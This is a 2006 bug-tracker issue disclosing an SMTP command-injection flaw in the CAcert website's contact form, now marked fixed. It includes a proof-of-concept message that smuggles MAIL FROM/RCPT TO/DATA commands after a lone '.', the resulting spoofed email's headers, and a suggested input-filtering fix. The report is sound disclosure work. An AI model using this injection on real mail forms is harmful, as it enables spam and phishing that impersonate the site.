View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0000145 | Main CAcert Website | logged out | public | 2006-03-04 10:13 | 2013-11-20 22:23 |
Reporter | Assigned To | ||||
Priority | urgent | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Fixed in Version | 2006 | ||||
Summary | 0000145: Beware of the Evil ... | ||||
Description | It is possible to send SPAM and Phishing-E-Mails using the CAcert mailserver. These emails look exactly as if sent by CAcert or CAcert-Support. Description =========== The cacert sendmail() function doesn't check the variables for control commands. The SMTP protocol defines a single "." as the end of a message. If you insert a "." in your message you can start a new message afterwards. Proof of Concept ================ Use the contact form on www.cacert.org and send the following message: ------------------8<------------------------- test . MAIL FROM: XXXXX RCPT TO: XXXXX DATA Subject: Owned! Sorry ... . ------------------8<------------------------- And you will have the following email sent to whoever you like ... ------------------------8<--------------------------- Return-Path: <XXXXX> Delivered-To: XXXXXXXX Received: (qmail 16437 invoked from network); 3 Mar 2006 23:53:18 +0100 Received: from hlin.cacert.org (202.87.16.201) by setoy.chost.de with (DHE-RSA-AES256-SHA encrypted) SMTP; 3 Mar 2006 23:53:18 +0100 Received: from hlin.cacert.org (localhost [127.0.0.1]) by hlin.cacert.org (Postfix) with SMTP id 07B33EA76B for <XXXXXXXX>; Sat, 4 Mar 2006 09:53:14 +1100 (EST) Subject: Owned! Message-Id: <20060303225314.07B33EA76B@hlin.cacert.org> Date: Sat, 4 Mar 2006 09:53:14 +1100 (EST) From: XXXXXXX To: undisclosed-recipients:; X-Length: 668 X-UID: 12259 Sorry ... ------------------------8<--------------------------- Solution ======== All fields writen to the mailserver must be free of control commands such as "." and newlines in From: (to create other "RCPT TO:") ... Chris | ||||
Tags | No tags attached. | ||||
Reviewed by | |||||
Test Instructions | |||||
Date Modified | Username | Field | Change |
---|---|---|---|
2006-03-04 10:13 |
|
New Issue | |
2006-03-04 10:38 | duane | Status | new => closed |
2006-03-04 10:38 | duane | Note Added: 0000091 | |
2006-03-04 10:38 | duane | Resolution | open => fixed |
2013-01-13 16:59 | Werner Dworak | Fixed in Version | => 2006 |
2013-11-20 22:23 | NEOatNHNG | View Status | private => public |